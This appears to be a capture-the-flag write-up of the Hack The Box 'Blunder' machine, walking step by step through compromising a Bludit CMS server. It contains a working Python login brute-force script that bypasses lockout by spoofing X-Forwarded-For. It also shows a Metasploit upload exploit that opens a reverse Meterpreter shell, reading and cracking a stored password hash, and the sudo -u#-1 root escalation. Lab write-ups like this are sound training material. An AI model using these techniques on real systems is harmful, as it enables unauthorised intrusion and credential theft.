HTB: Blunder Writeup 🖥
🔒 Security Engineer | Penetration Tester | CTF Player 🎯 Experienced in Product, Cloud & Infrastructure Security. ⚡ Skilled in Application Security, Multi-Cloud Security, Red Teaming, Penetration Testing, and Security Engineering. 🌱 Exploring GenAI 🤖 and LLM Security.
Tools
Nmap Recon
Dirsearch
Cewl
Python Scripts
hash identifier and decryptor
Metasploit bludit_upload_images_exec Exploit
Summary of Blunder Challenge
Nmap Scan
directory fuzzing
cewl generate wordlist
Use python script to bruteforce Bludit CMS’s password to bypass protection
cve-2019-16113,Bludit - Directory Traversal Image File Upload
passwords disclosure
use “sudo -u#-1 /bin/bash” one-liner to privesc - sudo security bypass
Initial Enumeration
nmap scan port:
nmap -sC -sV -Pn 10.10.10.191
Directory Listing since its port 80
Tried Directory Listing with Dirsearch got /adminand /robots directory
python3 [dirsearch.py](http://dirsearch.py/) -u [http://10.10.10.191](http://10.10.10.191/) -e *
On Fingerprinting got to know its using Bludit CMS
On further inspection with Seclists common.
wfuzz -c -w Downloads/SecLists-master/Discovery/Web-Content/common.txt --hc 404,403 -u "10.10.10.191/FUZZ.txt" -t 100
On further Directory Listing with WFuzz got /robots.txt /todo.txt directory
todo.txt has some juicy stuff
fergus looks like a user name based on the comment
Tried to brute for with common passwords wordlist in seclists but no luck this time.
Tried creating a worklist from website using Cewl
Now take this password.txt and fire up the Burp Intruder 🔥
There seems to some sort brute force protection mechanism implemented.
Googled about it and found an exploit immediately.
There is a protection in place but a bypass readily available.
https://rastating.github.io/bludit-brute-force-mitigation-bypass/
Upon Modifying it a bit.
#!/usr/bin/env python3
import re
import requests
#from __future__ import print_function
def open_ressources(file_path):
return [item.replace("\n","") for item in open(file_path).readlines()]
host = 'http://10.10.10.191'
login_url = host + '/admin/login'
username = 'fergus'
wordlist = open_ressources('/home/kali/Desktop/password.txt')
for password in wordlist:
session = requests.Session()
login_page = session.get(login_url)
csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)
print('[*] Trying: {p}'.format(p = password))
headers = {
'X-Forwarded-For': password,
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
'Referer': login_url
}
data = {
'tokenCSRF': csrf_token,
'username': username,
'password': password,
'save': ''
}
login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False)
if 'location' in login_result.headers:
if '/admin/dashboard' in login_result.headers['location']:
print()
print('SUCCESS: Password found!')
print('Use {u}:{p} to login.'.format(u = username, p = password))
print()
break
Got the password for fergus
Use fergus:RolandDeschain to login to the website.
Successfully able to login to site.
On further googling for exploits found this
https://packetstormsecurity.com/files/155295/Bludit-Directory-Traversal-Image-File-Upload.html
https://www.exploit-db.com/exploits/47699
looks like I'm closer to something.
I used msf to get a shell for easy exploitation.
Spin up Metasploit.
root@kali:/home/kali# msfconsole
IIIIII dTb.dTb _.---._
II 4' v 'B .'"".'/|\`.""'.
II 6. .P : .' / | \ `. :
II 'T;. .;P' '.' / | \ `.'
II 'T; ;P' `. / | \ .'
IIIIII 'YvP' `-.__|__.-'
I love shells --egypt
=[ metasploit v5.0.81-dev ]
+ -- --=[ 1987 exploits - 1089 auxiliary - 339 post ]
+ -- --=[ 559 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
Metasploit tip: View useful productivity tips with the tip command, or view them all with tip -l
msf5 > use exploit/linux/http/bludit_upload_images_exec
msf5 exploit(linux/http/bludit_upload_images_exec) > set TARGET 0
TARGET => 0
msf5 exploit(linux/http/bludit_upload_images_exec) > set RHOST 10.10.10.191
RHOST => 10.10.10.191
msf5 exploit(linux/http/bludit_upload_images_exec) > set RPORT 80
RPORT => 80
msf5 exploit(linux/http/bludit_upload_images_exec) > set BLUDITUSER fergus
BLUDITUSER => fergus
msf5 exploit(linux/http/bludit_upload_images_exec) > set BLUDITPASS RolandDeschain
BLUDITPASS => RolandDeschain
msf5 exploit(linux/http/bludit_upload_images_exec) > exploit
[*] Started reverse TCP handler on 10.10.15.49:4444
[+] Logged in as: fergus
[*] Retrieving UUID...
[*] Uploading wLeZlRdQzE.png...
[*] Uploading .htaccess...
[*] Executing wLeZlRdQzE.png...
[*] Sending stage (38288 bytes) to 10.10.10.191
[*] Meterpreter session 1 opened (10.10.15.49:4444 -> 10.10.10.191:50426) at 2020-06-27 06:35:43 -0400
[+] Deleted .htaccess
meterpreter > shell
Process 3053 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@blunder:/$ ls
ls
bin dev home lib64 media proc sbin sys var
boot etc lib libx32 mnt root snap tmp
cdrom ftp lib32 lost+found opt run srv usr
www-data@blunder:/$ cd var/
cd var/
www-data@blunder:/var$ ls
ls
backups crash local log metrics run spool www
cache lib lock mail opt snap tmp
www-data@blunder:/var$ cd www/
cd www/
www-data@blunder:/var/www$ ls
ls
bludit-3.10.0a bludit-3.9.2 html
www-data@blunder:/var/www$ cd bludit-3.10.0a
cd bludit-3.10.0a
www-data@blunder:/var/www/bludit-3.10.0a$ ls
ls
LICENSE bl-content bl-languages bl-themes install.php
README.md bl-kernel bl-plugins index.php
www-data@blunder:/var/www/bludit-3.10.0a$ ls -al
ls -al
total 72
drwxr-xr-x 8 www-data www-data 4096 May 19 15:13 .
drwxr-xr-x 5 root root 4096 Nov 28 2019 ..
drwxr-xr-x 2 www-data www-data 4096 Oct 19 2019 .github
-rw-r--r-- 1 www-data www-data 582 Oct 19 2019 .gitignore
-rw-r--r-- 1 www-data www-data 395 Oct 19 2019 .htaccess
-rw-r--r-- 1 www-data www-data 1083 Oct 19 2019 LICENSE
-rw-r--r-- 1 www-data www-data 2893 Oct 19 2019 README.md
drwxr-xr-x 7 www-data www-data 4096 May 19 10:03 bl-content
drwxr-xr-x 10 www-data www-data 4096 Oct 19 2019 bl-kernel
drwxr-xr-x 2 www-data www-data 4096 Oct 19 2019 bl-languages
drwxr-xr-x 29 www-data www-data 4096 Oct 19 2019 bl-plugins
drwxr-xr-x 5 www-data www-data 4096 Oct 19 2019 bl-themes
-rw-r--r-- 1 www-data www-data 900 May 19 11:27 index.php
-rw-r--r-- 1 www-data www-data 20306 Oct 19 2019 install.php
www-data@blunder:/var/www/bludit-3.10.0a$ cd bl-content
cd bl-content
www-data@blunder:/var/www/bludit-3.10.0a/bl-content$ ls
ls
databases pages tmp uploads workspaces
www-data@blunder:/var/www/bludit-3.10.0a/bl-content$ cd databases
cd databases
www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ ls
ls
categories.php plugins site.php tags.php
pages.php security.php syslog.php users.php
Now open user.php
www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ cat users.php
cat users.php
<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
"admin": {
"nickname": "Hugo",
"firstName": "Hugo",
"lastName": "",
"role": "User",
"password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",
"email": "",
"registered": "2019-11-27 07:40:55",
"tokenRemember": "",
"tokenAuth": "b380cb62057e9da47afce66b4615107d",
"tokenAuthTTL": "2009-03-15 14:00",
"twitter": "",
"facebook": "",
"instagram": "",
"codepen": "",
"linkedin": "",
"github": "",
"gitlab": ""}
}
We got password for user lets find out what hash is being used.
I used hash Identifier to know the possible hash algorithm used.
root@kali:/home/kali# hashid faca404fd5c0a31cf1897b823c695c85cffeb98d
Analyzing 'faca404fd5c0a31cf1897b823c695c85cffeb98d'
[+] SHA-1
[+] Double SHA-1
[+] RIPEMD-160
[+] Haval-160
[+] Tiger-160
[+] HAS-160
[+] LinkedIn
[+] Skein-256(160)
[+] Skein-512(160)
Using https://md5decrypt.net/en/Sha1/ I was able get the password value.
faca404fd5c0a31cf1897b823c695c85cffeb98d : Password120
No switch user to hugo and login with credentials
www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ su hugo
su hugo
Password: Password120
hugo@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ id
id
uid=1001(hugo) gid=1001(hugo) groups=1001(hugo)
hugo@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ cd
cd
hugo@blunder:~$ ls
ls
Desktop Downloads Pictures Templates Videos
Documents Music Public user.txt
hugo@blunder:~$ cat user.txt
cat user.txt
7c*************************b0
Got the user Flag
Lets check for all available privileges
hugo@blunder:~$ sudo -l
sudo -l
Password: Password120
Matching Defaults entries for hugo on blunder:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User hugo may run the following commands on blunder:
(ALL, !root) /bin/bash
hugo@blunder:~$
(ALL, !root) /bin/bash looks interesting
one googling I was able to get
https://www.exploit-db.com/exploits/47502 which is a sudo 1.8.27 - Security Bypass
Root Privilege Escalation Exploit sudo -u#-1 /bin/bash
hugo@blunder:/$ sudo -u#-1 /bin/bash
sudo -u#-1 /bin/bash
root@blunder:/# id
id
uid=0(root) gid=1001(hugo) groups=1001(hugo)
root@blunder:/# ls
ls
bin dev home lib64 media proc sbin sys var
boot etc lib libx32 mnt root snap tmp
cdrom ftp lib32 lost+found opt run srv usr
root@blunder:/# cd root
cd root
root@blunder:/root# ls
ls
root.txt
root@blunder:/root# cat root.txt
cat root.txt
43************************32
root@blunder:/root#
Getting root flag is so simple.
